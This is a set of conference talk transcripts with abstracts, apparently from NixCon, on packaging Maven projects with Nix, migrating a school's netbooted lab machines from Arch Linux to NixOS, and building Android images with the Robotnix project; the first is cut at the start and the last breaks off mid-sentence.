cargo, bundler, maven, cabal, npm, you know, dependencies are no longer rendered along with the source. And there's an expectation that you have some network connectivity to rehydrate those dependencies. Unfortunately, NICS build sandboxing disables network connection, you know, for good reason to try and force reproducible builds. So, you know, what can be done here? And maybe, you know, the simplest NICS derivations shows that and that's fixed output derivations. Is the solution to this problem? The basic formula that many languages with support in NICS do is they take their custom lock format, generate a NICS expression. So this is the NICS language support. One step is here. So takes the lock format file, generates a NICS expression. And then there's accompanying NICS support to take that NICS expression and use fetch URL to download all those dependencies and bundle them all together in a single NICS store entry with linkfarm. And ta-da, we have our vendor directory back. You know, this works because that NICS expression contains the SHA. So fetch URLs allowed to proceed in the sandbox environment. Okay, so I'll go pretty slow here. Yeah, again, sorry, I know it's like a bummer to see code and text in slides. So just to put in perspective, here's the contents of a popular NICS tool for Ruby. It's called Bundx. So on the left is my gem file lock. So that's your lock file that pins your transit of closure of your dependencies to specific versions. Bundx takes that on the right and generates a NICS expression or really anything native to NICS would work fine. So many tools use JSON. You can see here it tells you where to download it from as well as the SHA, which is important for the fixed output derivation. What's not shown here is the call to generate the final NICS store entry, but I've included it here and you can see it's a link farm of all those downloaded dependencies. And with that, you can now pass it to your language of choice. In this case would be Ruby and you have your vendor directory essentially and all your dependencies. You know, what's really nice about this pattern is it's pretty granular. So because we're using NICS link farm, all the dependencies have unique NICS store entries. So they're reusable. And because they're a particular version, but it's somewhat pragmatic because it's a flattened tree. So it's, you're not getting the full transitive graph, which would be kind of neat so that you could use like NICS, NICS query, NICS store query to see even your dependency tree from your language in the NICS store. But I think this is a good middle ground. Okay, so enter Maven. So Maven was released in 2004. So I think NICS is 20 years old. So not quite as old as NICS, but pretty old still 16 years. It predates many, you know, newer languages and package managers. And it has still a huge market share. I'd say Java is predominantly split between Gradle and Maven. Not really sure which one's the dominant one. Subjectively for me, it's been Maven. It does things different than what you might come to expect from more recent package managers. And I think the most important one is it does not generate a lock file, which is interesting. It relies on the fact that the algorithm with which it walks your dependency tree is stable and explicit. So the same versions are always resolved. And it uses a nearest wins strategy. So as it's walking your graph, if you have a diamond dependency problem, so two different dependencies depend on the same library, but at different versions, you know, during the nearest wins strategy, whichever one it hits first is the one you're going to resolve to. That's, I guess, kind of, you know, it's interesting because then it doesn't have to do any SAT solving to find correct versions that work within ranges. The problem though is now adding dependencies or even bumping anything or changing anything in your transitive closure can really change the graph and have reverberating changes to the dependency versions. And then there's the fact that Maven is closer to make rather than some of the other package management tools because it's really generic. And you can plug various plugins to augment your build lifecycle in any sorts of way, in any way. It's an XML, so it's quite verbose and kind of challenging to also work with. So, like, what are the challenges I see with Maven in next today and incorporating Maven into next? Well, for one, it has some APIs externally to investigate the dependency closure. So, and this would be useful for writing a tool that generates the Nix expression or JSON, but it's somewhat restricted and actually pretty incomplete. So, it has a rich ability to generate plugins for itself and offers substantial flexibility there. However, any external tooling is lacking. The current API they offer lets you introspect, compile, or runtime dependencies, but you exclude all those build time dependencies that are useful for plugins, which you still need to run Maven in a network isolated environment. And like I said, it's a pretty generic system. So, really trying to capture a one, a really good one size fits all solution is challenging, especially since it's used a lot in the enterprise world, they're more likely to have some bespoke use cases where they're really doing interesting patterns. I mean, I think that's also why it's so popular in enterprise, because it can really do anything. Finally, there's some like anti-patterns that are really popular in Java that are kind of antithesis to how Nix wants to do things. So, when you wanted to distribute a jar or your application, it was really popular to build what you know, called a fat jar or uber jar, which is, I think, a good analogy would be a static binary. So, you're bundling all your dependencies together in a zip, which is what a jar is. You just, you can't leverage then a lot of the granularity and the cashability of Nix through the store. And finally, there's just not a lot of documentation or examples in Nix packages, you know, maybe likely because a lot of it's closed source, and this is what my talk secured at. So, augmenting the documentation, showing how to do it today, and getting people to contribute more openly. So, I want to talk about two patterns of how to package Nix really quickly. The first is the double invocation pattern. Actually, it's not really specific to Maven. You could use it with anything, but it's quite useful here. I actually came across this pattern in a GitHub issue, which is somewhat, I guess, typical with how you come across solutions for problems at the moment in Nix. A lot of Googling and reading through GitHub issues. You run your full build, which would be this top part here. This whole derivation is running the first build once. And Maven repo local is where it's going to be building out the cash dependencies locally, and I'm setting that into my Nix store. There's a little cleanup phase here in the install where I'm just removing things that help to keep the output hash more consistent. So, like timestamps and files that Maven wants to generate. And it's double invocation. So, you run this once, you kind of fix up your output hash. So, you put a fake output hash to start, tells you the output hash you expect. And now the output of this derivation, I could then feed into a subsequent Maven build and tell it to work in offline mode. So, I could use this Nix store path to basically rehydrate a subsequent build. You know, surprisingly, this isn't bad and it works in practice. Pretty not bad. However, you know, due to the lack of a real log file and ways some people choose to structure their Maven application. So, you can do this in version ranges or unfortunately the use of snapshot, which is a special type of development copy. So, it's not pinned to an exact version. You really run into the problem where the output hash is not reproducible. So, submitting this into something like Nix packages may not be optimal because it might get out of date and be unbuildable pretty quickly. So, it's not very granular as it's downloading all the dependencies within a single Nix store entry. So, subsequent rebuilds of this derivation have to essentially re-download always all your dependencies all over again. And you have these pretty coarse store entries. So, here's actually using the previous Nix build on vacation, previous derivation. So, here I actually set the repository which would be a variable set to the previous derivation. And what's important here is I'm telling it to run an offline mode. And yeah, we're off to the races there. So, there is actually some, you know, air quotes here, official support and bill Maven language support for Maven Nix packages. And it's called build Maven. So, it relies on a Maven to Nix plugin, which I've included here as the sort, link to the GitHub repo. Put it quote unquote official because what spurred this talk is there's very little recent activity. So, the last commit was 2017. And I think there's some improvements to be made that I'm submitting as well as, you know, lack of documentation. It tries to fit in this pattern that we see other tools doing and language support. So, it does generate a lock file and it uses the link form pattern. But it only goes as far as actually generating a jar. So, which is your library, but if you're a service author or an app author, you know, you want to get to a runnable artifact. Okay, sorry, we'll go through this quickly. So, maybe just to show how intricate Maven is, I have a screenshot here. The POMXML, this is like package JSON or something similar in other languages. This is how you define a project. This is like the most empty project you can write. I just have the name of my project. No dependencies, nothing. I then take this and use Maven to Nix that plugin to generate the lock file, which they called project info.json. And what I thought was great and what Nix is great is making you hyper aware of the dependencies you need to build that were so implicit. So, just an empty project here has 257 jars and 640, you know, items essentially in my Nix store. So, some other metadata. Like that was kind of eye-opening for me, like what you need to just start off with an empty project. Kind of the bottom photo here shows that link farm it's building. So, it's still following the pattern of other language tools. So, it's still kind of flattened and pragmatic. It's just one level deep tree. This is like a pretty good pattern I wanted to share. So, if you wanted to make the jar actually runnable, it's pretty easy to do this. So, in Maven, you...Jars can self-describe their class path, which is very similar to like where they load their libraries from within the jar itself. And Maven, you can augment it with a plugin to modify that file and dictate the dependencies. So, all you need to do here is put a little snippet like this where we're saying add the class path for all the dependencies in my project. The prefix is going to be lib relative to where the jar is, which is great because we want it relative to the Nix, because it's going to be in the Nix store. And the layout type is actually repository, which is also great because that's the Maven repository layout format, which we had already built to actually even build the jar in the first place. So, all I do is you take that repository and you link it into lib and copy your jar out. And I make a little wrapper to run it so you don't even have to... You can just run a little script that starts up your jar and loads it by your class path and you're in business. I guess the little downside at the moment here is I've added quite a lot more than I need to to my class path. So, I've added all the libraries I need to actually build the jar. So, there's some improvements here to slim down the repository down to just what you need for runtime. So, kind of looking forward, I want to love to meet and contribute with others working on Nix and Java. I showed earlier how popular Java is, so surprising to hear so little of the community. I mean, I think Nix is great in having a really vibrant Haskell community and some other languages. So, I'd love to see something align more with how popular Java is. This is kind of just the surface and I'm only covered Maven, but the Java ecosystem, or I guess JVM-based languages, are pretty fragmented. So, there's Gradle, SBT for Scala, Linnigan for Clojure. So, what's a way to build a really cohesive story around all these tools that work together? I mean, because fundamentally they're building jars and they run the same way. I think there's an interesting opportunity to also build patterns that use J-Link. So, that's actually a tool that rather than having to distribute the whole runtime for Java, builds a small runtime image, a native image, which would be pretty cool. And, you know, help me out and look for other contributors. I'm adding language support documentation for Maven and Nix packages. And, you know, we'll continue to help improve the story here. And I just, so that's my talk. And I just wanted to thank, you know, the Nix community, the NixCon committee for kind of making all this possible. Thank you. Yeah, you are very, I definitely appreciate that. Okay, it doesn't seem that we have, we have at least one question for you. Um, okay, the first question will be, I'm getting a really bad feedback. Very disorienting. Sorry, I will try to make do. Hi. It's from NixNut. Any experience with Gradle and Nix? I guess this is a question. I haven't yet. I was looking into it to try as I'm adding documentation and I actually see that Gradle has a plug-in to generate a lock file, which I was making the claim that Maven doesn't natively. So, I actually think the story here will be much better. But it's, there's the second half, so there's building your Maven repository because that's what all these JVM tools still use. It doesn't matter what the top tool is. Many of them rely on the Maven repository layout and, like, kind of federated way to distribute packages. So, unifying that, like, final piece of building the JAR and Runnable is what I'm interested in as well. Okay, I'm sorry. The feedback I was getting is no longer there. So, I can pick up again because it was, like, being disoriented. I'm very sorry about that. So, I don't believe we have any more questions for you. So, thank you for your talk very, very much. Yeah. Yeah, thanks everyone. Yeah. I appreciate it.
Java is one of the most popular languages (ranked 2nd by PYPL [1]), however there is a fragmented and incomplete solution when it comes to tooling available by NixPkgs. This talk will go over the current state of affairs (what's available today), what's so difficult about Java compared to other supported languages in NixPkg and a proposed solution (mvn2nix [2]) aimed at filling the gap. submission outline: - discuss how other languages integrate with Nix; mainly by creating fixed-output derivations for their dependencies which are fetched to construct a build environment. - communicate that Java's main build systems (Maven & Gradle) go beyond much more than simple dependency retrieval; generate sources or even bytecode weaving/ - touch on Maven specifically; whose initial release was in 2004. The tool is immensly complex and it is non-trivial to determine all the necessary dependencies. - go over the "double invocation" pattern as a workable solution - announce / release mvn2nix as a forward looking solution
10.5446/50711 (DOI)
Okay, the next talk up is bringing next to us to my school by Mark Schmidt. And this presentation will start with a current state of the learning infrastructure running on Arch Linux and the challenges that we faced with it, ups and downs, signs of migrating to next to us and what has already been done. So I believe the school that this is about is school that marco's to EPI TA, I believe is pronounced EPI TA, a French school of engineers in computer science. And it's bringing next to us to its students. So it's going to be a presentation sort of showing the challenges of maintaining infrastructure of more than 800 machines used by students. So they started using next to us a year and a half ago when they were in California for a school trip. That's pretty cool. And they wanted a way to like manage config with like it. And I know a lot of people like just like I'm a mark tried Ansible, then then found next to us and I will say that next to us is much better than Ansible for this kind of thing. And he is also an organizer at prologin, the French national computer science contest. And a cool thing we share in common is that well, I don't play the same restaurant by a musician is he played by, he plays viola and he's done that for 14 years now. Okay, take it away. Right, so first I'd like to thank the organizers for their work. What they're doing is terrific. So as you said, we'll have peace. I am a student that's at my fourth year. I'm part of a laboratory, which is called the tree, which stands for central resource informatics, which in English means roughly IT resources center. So we're also a school departments in charge of managing the educational IT needs. What that means is anything from hosting Moodle to managing the computer rooms, which is what I will be talking about today. Right, so we'll skip over that. So Epita is still a school that has computer rooms much much like this one. This photo actually is not accurate because now we have screens that stand on top of the tables and that aren't inside and we are using Intel NUX as our computers that are attached behind the screen. It's very, very convenient. However, the tree does not manage everything in those computer rooms. Indeed, Epita is part of a group of school called UNIS that tries to mutualize needs, especially in IT. The department responsible for those is called the Bokel and they manage everything from phones, office 365 accounts, Wi-Fi and our computer rooms network. This means that we actually have some impose requirements when managing the computers in those. Our computers used to not have any disk, which meant that we had to boot the machines via network. However, our computer rooms only have a one gig uplink for each computer room. And since we have 13 computer rooms across six campuses in France, that would just kill our solar room uplink. That's also one gigabyte if we booted all the machines at the same time. So what we are doing is basically having our in-it RAM FS that downloads the root FS using a Aria 2, so BitSorrent. So we don't have to actually download everything from each machine from our server room. So as I said, we have 13 computer rooms that adds up to about 800 to 1000 machines, which probably makes it the biggest IT infrastructure running Arch Linux in France, maybe Europe. And to give students some persistence on those machines for the files when they're working on it, we're using Kerberos for authentication on Open AFS. For those who don't know what Open AFS is, it's basically a network file system that you can log in using Kerberos. Only you can see your files, not like in NFS. We also actually have several images that the computers can boot from. We do that because depending on what year you're in at Eputa, you're going to be working with different software and we don't want to include all the software you use that Eputa in one image. It would just be too big. Right now our images are about 2GB size, so all the software would be way too much. So currently our boot process goes as this. So the machines are configured to Pixi by default. They get their IP from the switches in the computer rooms, which forward the HTTP request to our servers. Then in this HTTP request, our servers tell the computers to download IPXE from our servers again using TFTP. Then IPXE queries a menu from a homemade service that actually manages IPXE menus, which allows us to select a default image for a room depending on what year, what promotion of student is going to be using it. And then once the image has been selected, IPXE will then download the kernel and in its RAMFS via HTTP from our S3 servers. And then in its RAMFS, we'll download a torrent file via HTTPS again. It finds what torrent file to download from the kernel command line. And then in this torrent, there is a rootFS-quashFS, which it downloads and then it mounts it and switch routes on it. If the computer has a disk, so our old computers didn't have a disk, but now we have one in our internal look, and we can actually do some boot cache. So we have a partition in which we store the torrent file and the contents of that torrent. And so the machine doesn't have to actually redownload the image if it hasn't changed and it had downloaded it before. Also once the machine is booted up, there's a service that seeds those images. So a booted up image is capable of seeding its own image and also any other images that it would have been downloaded before. Okay so how do we build an image? So using Arch Linux, as I said previously, we use Drakot for our In-N-Tar D because it's quite convenient, easily customizable, and it just works. We use Salt to manage our configuration and what packages are going to be installed on the machine or in the image. And then some custom tools including Arch Creator, which is basically a script to bootstrap an image. So the first step is what you would do in any classic Arch Linux installation, that's packstrap a root FS with some basic software. The second step we do is we install Salt. We actually have to pin this Salt version for a very simple reason. The current Salt version in Arch Linux repositories is broken, so we have to install our own. And then we have to patch system, well actually system CTL because the latest version of Salt doesn't support the latest version of system D that's shipped with Arch Linux. So we actually have to hack the output of system CTL-Version to remove that version and replace it with a version supported by Salt. Otherwise, Salt will just not start. Which is what we do just right here. Salt call and the important part is this, state of high state. What that does is Salt is going to create Saltmaster, which then looks in a Git repository on the master branch and applies a configuration on your current system, which in this case is a root FS, so we're inside a shoot right here. And then we undo our hack, we install some kernel modules, we generate our initRT using drag cuts, and then we create a squash FS with everything that we've done just here. Okay, so this setup actually has a few problems. First it's not reproducible for a very simple reason. Every time we start an image build, we don't know what packages are going to be installed because well, Arch Linux is a rolling release, so they just release packages whenever they want. So we would just install what's latest in the Arch Linux repositories. We could actually pin all those packages to a version, but there would just be too much maintenance for not much result. So we just hope that every time we rebuild an image, everything just goes fine. Salt is a pain because of what we've seen just before. It's also very hard to test the changes we do on these images. Right now we have two ways of testing changes. The first one is to push on a branch on our soltrapestory, build the image. We usually have an image called Arch Linux test for this purpose. So once the image is built, which takes in somewhere between 20 to 60 minutes, we can actually start a machine using this image, downloading the image depending on where you are in the school, how good is your connection can take between 2 minutes to 15 minutes. So you're in for about 30 to an hour and 30 minutes before you can actually test your changes. So it's very hard to iterate on any configuration changes that you are doing. The second way we have to test changes is actually to commit on our soltrapestory on master because of course, and then go on an already booted up machine and run solt called state.highstates, which is going to query the configuration it should have from its solt master and then apply it on the system. And then we can test it, which is pretty fine, but again pushing on master not great. And you can test anything if you make any changes to a system D unit that gets loaded on startup, you can test that, for example. CI takes forever as I said, and we also don't have any packages cache, which is probably why the CI takes forever, because we have no time to implement it. As far as I know, it's not very much trivial. So there's quite a running gag in our team that says, if we switch to NixOS, it's going to solve all our problems and everything is going to be fine. Everything is going to be fine just right after that. And what we, well, I actually decided to go and find out. So I mainly got inspired from the netboots configuration in Nix packages. And then what I did is basically hack on it. You can find everything here. The two things I needed to add on top of the netboots configuration was torrent downloading, which is basically putting aria2 in the initrd and then launching the command here. And add boot cache support, which is basically checking if a partition exists. I do right here. If it does, you mount it. If it fails, we just mount a tmpfs so the image can still seed while the torrent file. Right. You might wonder, how do I get the init file? In a standard NixOS installation, you would have a kernel command line argument called init that equals to something like slash nix slash tor slash hash, nixOS system slash init. But the thing is to add that in our current setup, I would have to have an API route on our service that manages images to upload, to update this path. And I just couldn't be bothered. So I did something that's a bit of a hack and frankly not quite satisfying. What I do when I'm creating my squashfs, so the closure info, that's basically everything that has to go in the image store contents is a list that contains config.system.build.topLevel. So I have that, I have to put the nix path registration also in my squashfs. And then when the system boots up, I have to run nix store loaddb and everything is in there. And then I echo config.system.build.topLevel slash init. That's going to evaluate to something like slash nix slash tor slash hash dash nixOS slash system dash whatever slash init which I put here. And I echo that in a stage2 init file. This stage2 init files end up in the squashfs. And then in my init.rd when I am done mounting everything, which means I have my nix store mounted and just right before I switch to stage2, I actually export this variable stage2init which is the variable that's usually set when the stage1 parses the kernel command line arguments. If there's init, it will set stage2init to whatever value is provided. And here I just set it to what would be in slash nix slash tor slash stage2init which comes from here. There's a better way of doing this actually. I would have to generate an IPXE script like that's what's done in the netbook module in Nix packages which is actually the right way of doing it. And then upload that IPXE script also to our S3 where things get downloaded from. And our service that manages images instead of providing a kernel and install.j to download it should just chain load on that script in our S3. I have to test it but it should work and it probably will be a better solution than this. So let's go over the list of the problems we had before and see if we solved some. Not reproducible. Well, Nix helps a lot with that since we can pin our packages which is the main problem we had before. However, my images are not yet fully reproducible. I noticed that when doing some tests to see if I could just upload an image on S3 even if it hadn't been updated. And some bits actually change between the two images I built at separate times. I haven't had time to investigate it but the only thing it adds up is that we don't have to have the manual step of going into our GitLab UI and start the job that uploads the images to the S3 which we want to have anyway so we just don't care about this. So we're pinning Nix packages using Flakes so we are only upgrading packages when we want. Salt is no longer paying because we are now only using it to actually run commands on several machines across a computer room and not using it to build a system anymore. So that's better. It's not hard to test changes anymore because you can just run a Nix build, config.system.build.vm and launch a VM which takes about a minute which is much better than the R we would take you before and you can iterate on hacking configuration pretty fast using that method. The VM is actually a bit broken right now because I won't accept my netboot configuration but I just have to override that output and disable the netboot. But detail. We now have a CI which only builds the top level configuration and not what I call the netboot top level which includes the squashFS which takes some time. So the CI is pretty fast because it's only building a Nix-VS configuration. Some packages does not take a very long time. It allows you to have some feedback when you push on the repository if your configuration is valid and builds. The squashFS part of the build which is what takes most of the time of the build is separated into another job that's launched manually as I said before and also uploads the images to our S3. And we also now have a binary cache that we set up in a few minutes so we can cache our packages and our configuration. Now let's go over what that provides to our students because what we've seen right now until then is what it helps us to do. Let's see what it allows our students to do. First they can reuse the configuration. For example our Kerberos and OpenFS configuration is exported as part of a Nix-VS module in our Flake which means they can import it in their configuration and use it from there. So they don't have to reconfigure all the servers and everything from their configuration. They can just use ours and if we update it they will be updated up to date with it. Students can also install the same packages we have at school which means they'll have the same environment as they would have at school which means it's also the same environment that's used in the test when we automatically test their code to grade it. And then they can, so on the commutators at school install new packages. Right now the only way they have is to download the source and compile it from there. Now because Nix is a multi-user they can actually install packages. So what's done, as I said, Netboot works. Kerberos and LDAP configuration and thus OpenFS support also works. I already have included some packages needed for development by the students. I think there's only Python right now. I have to add a bunch more but that's for later. And the CI for the images deployment works too. What's left to do is some extensive testing. I've never used them before, I have to see how they work, will they integrate with our workflow and that's some more work left to do. I have to write some introductory blog posts for the students that already worked one. Explaining from the very basics what's a package manager, what's its role, what does it do, how does it do it for a classic one and then how Nix does it. I have to do some team training because currently in our team we only have two people proficient with Nix and NixOS. But if you want to use that in production as a long-term solution, well, we have to train the whole team so they get on board and then know how it works. And then I have to write a small script to live update the images. So with Sol you could do a state.high state which you can't do anymore. So I have to find a way to update the images while they're running which is pretty simple, I guess. And then what's next for this project? It will be on a one-year trial so the student can test it, they can provide us with feedback and we'll see how it goes and maybe we'll do a full switch to NixOS. And then the last item here is just some blue sky insanity for me. Maybe I would be able to somehow share the Nix store between all the machines in a room. I don't know how I could do it, maybe using IPFS, I don't know how that works. So if one student installed a package and another one installed the same package, they could just download it from the other computer instead of downloading it from cache.nixos.org. All right, I guess that's all from me. If there are any questions, I'll be happy to answer them. If you let me just switch to the JITSEE room. They just rebooted. Yep. Live streaming is on. Okay, everyone, sorry about that. We had a little slight technical difficulty with the stream and the JITSEE room being cancelled but we ironed that out. So this now enters into the Q&A portion of this talk and we do have, I think, three questions to which are actually from the speaker who's going to be speaking right up next. So first one is, have you tried to bring NixOS to the routers? Is there a plan to do so? Sorry, to the router, you said? Yeah, to the routers. Okay, so we don't have actually any plans for that. The only plan right now is to use it for the computers used by the students. Okay, gotcha. And what kind of network setup does EP to have? Or runs? Well, what do you mean network? Like, okay, so, well, it's quite complicated. Basically, it's a mess. We have a computer room has a net. Our server room also has a subnet. The book I spoke of at the beginning of my talk actually routes them for us. So I don't exactly what goes on behind the scenes on their infrastructure because I'm not working. And then the only network we have to do is the one in our server room. So that's pretty basic. Even though we have some weird stuff going on for adding between the LAN and all that stuff. I'm not sure that is a question. I have my eye on the, oh yeah, okay. I have my next con QA channel if you want to. Okay. So, yes, there is isolation. Probably, but again, that's not what we do. That's the job of the book out to do that. Right. And someone just said you should not tell that to strangers. Okay. The next question we have is what and if there is CI, what is it? Is it being used? So we're using GitLab's CI because that's what was used up until then. We're not really planning to use Hercules or Hydra because, well, that just doesn't fit in our flow currently. I'm not quite sure there's a way for them to automatically upload the outputs of builds. Like not the path in the next store, but actually it's in it. So I don't want to, you know, when you next build you have a results sim link. I don't want to upload what's behind that result in link, but I want to upload only results slash, let's say, nixOS-test.nitrg and nixOS-test.squashfs and nixOS-test.colonel. I want to upload these three files fully to three with the same name. So I actually change my image. So we're not currently planning on any nix-focused CI system. Right. I've used Cache 6 for some things like that. I'm not sure if it's entirely possible to do what you're doing, though. It might be worth looking into maybe momentarily. Okay. So I don't think I see any more questions in the channel. Right. Yeah. I think that concludes the Q&A session. Thank you so much. Thanks to you.
EPITA, a French school of engineers in computer science, is bringing NixOS to its students. Here is a presentation of the challenges of maintaining an infrastructure of more than 800 machines used by students. The presentation will start with a current state of our learning infrastructure running on Arch Linux, the challenges we face with it, the up- and downsides of migrating to NixOS and what has already been done.
10.5446/50712 (DOI)
Okay, hello. That was like probably the briefest transition ever. So we have Daniel Fullmer and his talk is called Robotniks, Build Android AOSP Using Nix. And the topic of this talk is that Robotniks enables a user to build Android images using the Nix package manager. AOSP projects often contain long and complicated build instructions requiring a variety of tools for fetching source code and executing an incredibly convoluted one like it was mentioned. And just some brief background about Daniel is that he started using NixOS in 2015 and he just really liked the model and just got into it right away. He was a recent graduate from PhD, from Yale for electrical engineering and focusing on control theory and distributing compute. He also started as a chief scientist at Achilles Heel Technologies this year and his interests outside NixOS are actually weightlifting and powerlifting. So he asked for a call. Take your I-Fuck. So Robotniks is a project I've been working on over the last year to year and a half which aims to build Android or more specifically the Android open source project using the Nix package manager. Before I go to Robotniks I want to briefly describe how you might go about building Android by following the instructions on the android.com website. So to begin they recommend that you use ubuntu 18.04 and like many projects they have you apt-get install a whole set of dependencies. Additionally there's a tool that you need to get called repo or git repo which will fetch the Android source code and this is a tool that manages the large collection of git repositories and git trees and puts them into a single source tree. So in order to use this you need to create a directory run repo init and then repo sync and download roughly if I recall roughly 40 to 50 gigabytes worth of source code and you'll have to know the the name of the git tag that corresponds to the latest Android release. And finally to build the code and specifically we'll have it build for the Google Pixel 3 XL which has the code name of crosshatch. You can run those following three commands and then wait for a very very long time. On my old computer it used to take roughly eight hours. I got a much faster computer that can do it in just over 30 minutes but at the end of this process you'll have a number of build products under a certain subdirectory and this is the so these are the instructions that are on the android.com website. However there's a number of limitations to those instructions so for instance the the kernel and the chromium webview that are included in this will be in the source tree and these are pre-built versions of the kernel and chromium webview and so they're oftentimes out of date and don't correspond to the latest secure release. It'll also be missing proprietary vendor binaries that are required for your android image to work on a real pixel 3 device and finally this build wouldn't be signed with secure signing keys. It would actually be signed by a set of keys called test keys which are just for development and testing. All the issues that I just mentioned there's documentation on the internet about how to go about solving all those things but they're not readily accessible and they require many more steps especially for something like building chromium webview which is an entirely different build system. So in contrast Robotniks aims to make this process much much more simple. So here to build a pixel 3 excel image you'll just get clone the Robotniks URL and then run nix build by passing an argument a configuration argument where here we're just selecting the crosshatch device which corresponds to the pixel 3 and we're choosing the vanilla flavor of AOSP and then you can flash the result the resulting image after it finishes building. So it's much much simpler than the the standard sets of instructions you go about for for building android and it includes all the dependencies and handles all of the the tricky complexities about integrating all of those sets of projects. So you might ask you know why would you want to use nix for doing this sort of a thing and nix in particular for this type of a project is very good at integrating all of the diverse build tools across all these diverse project ecosystems including android and chromium and the linux curl. It also has great guarantees around the reliability and reproducibility. In particular the the default nix sandbox ensures that your code is depending only on explicitly defined inputs. So Android 10 actually does a little bit of sandboxing their builds now with a tool called nsjail which at least disables network access which has been quite nice for the rest of the nix the android ecosystem because it restricts them from being able to have a script that just goes and randomly download some source from somewhere else. You have to have everything at the at the beginning of the the process. And additionally in nix will require all of the built inputs to be hashed and we can't sneak in any impurities in through other means. So then some of the broad goals of the Robotniks project are simplicity. I'd like it to be very simple to use. You shouldn't have to know anything about the android build system or the chromium build system in order to use Robotniks and build android images. Additionally I'd like to have some measure of customizability and I recognize that is somewhat in conflict with the goal of simplicity but I hope that we can tow a fine line between the two values. Another goal that I have is on reproducibility and here I mean bit for bit reproducibility by which I mean any two people should be able to if they build the same configuration they should receive the exact same output bit for bit. There should be no difference between the output files. I'm also interested in authenticity specifically the authenticity of the build inputs that the source code comes from authentic sources and specifically some of those proprietary vendor binaries that I talked about previously. I'd like to get them from authentic sources like for instance the vendor themselves. Additionally I'm interested in security and privacy. Robotniks doesn't do anything particularly new in terms of security on android but we at least try to maintain the android security model in terms of things like android verified boot for instance. This is in contrast to some other projects probably popular projects and additionally privacy because we're building open source android builds that don't include things such as the google play services. We potentially mitigate a number of privacy threats. So returning to that goal of customizability Robotniks uses like a NixOS style module system that allows us to select what options we want to enable or disable. Here I've included an example configuration and I'll discuss some of these options in terms of each of these modules in the future in the coming slides. Some of those modules including things like choosing which flavor to build, things that we can do with chromium and webview, the linux curl and others. So the flavors that Robotniks currently supports as we support the vanilla AOSP. This is the source directly from android.googlesource.com and this has been updated to the Android 11 release which was released last month and it focuses on just the pixel phones for now, the google pixel phones. We also support another android project called Graphene OS which is the privacy and security focused projects which does a number of hardening of the android operating system and it also is on android 11 and focuses on pixel phones. Finally there's probably the most popular android project LinioJOS which I added a couple months ago in what I call experimental support because I don't personally use LinioJOS and so some of the LinioJOS things might conflict with some of the Robotniks modules and I haven't tested all the combinations of those things yet. But I believe it's still on Android 10. I don't believe any devices are on Android 11 yet but however LinioJOS has a great support for a very large number of devices. I already talked a bit about how Robotniks builds the chromium and the chromium web view from source so the android system web view is the component which allows all these android apps to display web content and it really is a it's a necessary component of the android system. You can't really build a usable android image without having an android web view so it's nice to be able to build it from source and in fact we can build a couple of chromium forks including bromite which focuses on privacy and monadium which focuses on security as well. I also have some options to enable custom linux kernels you can have your kernel source come from any other source tree as well as allow you to easily patch the kernel that's included in the android build. Additionally we enable you to easily sign your build with your own custom generated keys so you can have a set of android signing keys which you control and only you control and these keys are necessary would be necessary for you to side load updates or do over-the-air updates. In that way you can control the software that runs on your phone. It has to be signed by keys that you control. Additionally pixel phones have a very nice feature with regard to the verified boot where they allow you to set a you have a user-settable root of trust which corresponds to your your custom android keys so this is all part of the verified boot sort of methodology where you have a read-only system image and any modifications to that image have to be signed by keys that are trusted in this very low level below the boot loader even. There's also a module that allows you to do over-the-air updates. There was an updater app from GrapheneOS which has been incorporated into Robotniks and we allow you to set a custom URL that this can check for updates against. So it needs to point to directory containing those update files as well as some metadata and we and have a simple derivation that allows you to easily create such a directory. There's also a module for FDroid which is the free and open source android app repository. It also comes with a privileged extension which allows you to easily install apps without having to enable some of these extra options like the unknown sources option. In a similar way like the Google Play doesn't have this restriction additionally the privileged extension allows you to install updates in the background without having to go manually click install on every single update that you care about. There's also micro g which is a re-implementation of a number of Google's proprietary android user space apps and libraries. So this re-implements parts of the Google Play services. A number of apps unfortunately require Google Play services to work but I've tested things like push notifications through micro g work well in Robotniks. Finally there's also a very nice backup system called C Vault backup which uses an internal backup API and like on the the android images from Google directly where you can backup application configuration to the Google Cloud C Vault similarly allows you to backup application data to like a USB drive or to a hosted next cloud or something like that. And then there are two more sort of generic modules that I want to briefly discuss one of which allows you to easily add additional source directories to the the build itself. So here I have an example of extra dash dirr you just set a dot source and that can be the output of any other Nix derivation and that the output of that would be included in the android build. Additionally I have a patches option which allows you to very easily enable particular patches on some of these android sub projects. And because the android source tree is so large like I said 40 or 50 gigabytes if every single time you had to build android like the default way it's done in Nix is to actually copy all the source every time. I have a little optimization that will do bind amounts to avoid copying the source every single time you want to build android. And the the flavors that I talked about previously the way those flavors are implemented is they mostly just set up the default sets of source directories. Finally you can also include additional pre-built applications in the image. So here I'm adding an example application to some example dot apk. So naturally this could also refer to the output of any other derivation. So if you had something that built an application you could include it in a robotics image using this option. And let the other options many of the other modules like C-Vault and MicroGear actually implemented using this app.pre-built option. So C-Vault is built from source for instance produces an apk and then we include that apk using this option. I also have the ability to launch an emulator with an attached Robotnik spilt image. So here we're selecting the x86-64 generic device and building an emulator. You can run that directly on your desktop. It's all it's very nice for conveniently testing out some of the other Robotniks options like if you want to test out if MicroGear works or if C-Vault works you can do it locally on an emulator. Next there's the the SDK. So the Android SDK which includes some utilities like fastboot or adb which are used for flashing your phone. Google publishes pre-built versions of the SDK but they publish them under an additional SDK license. However if you actually look at the code that goes into producing that SDK it's mostly Apache and GPL. And in fact the Robotniks project has a little subdirectory, the SDK subdirectory which if you build that that the derivation in that directory it'll actually produce a full open source SDK for Android including things such as fastboot and adb which would be unencumbered by that SDK license because it's built entirely from permissively licensed sources. So like I said one of my goals was reproducibility and Google actually does a fairly good job with reproducibility of Android builds. There's only a few small patches mostly concerned with things around signing and the target files and some partition impurities. And so in the past like a month ago a few months ago I've verified that the output of Robotniks is actually bit for bit reproducible for both the Pixel 3 and the Pixel 1 on the vanilla flavor. But lineage OS we also have some patches to fix a few small impurity or non reproducible components of that and we've tested it to be reproducible on certain devices as well. But a thing that I'd really like to do at some point is to have like an automatically reproduced reproducibility report kind of like the the R13Y report for the NixOS minimal ISO. I think it'd be very nice to have that for Robotniks as well. And so the remainder of this talk is going to be some ideas for future work on Robotniks and more speculative things in the in the future. So one of the big sort of limiting factors for building Android is the requirement that you have a fairly powerful computer and can fetch a lot of source code. Robotniks builds most of the Android in a very single very very large derivation which executes that full Android build process and on many machines will take multiple hours up to 8 to 10 to 12 depending on what exactly you're building and how powerful your machine is. But once you've built this derivation the the signing step can actually be done in another very small derivation that just depends on the output of that that large derivation. So you could do something like publish the output of that large derivation, a 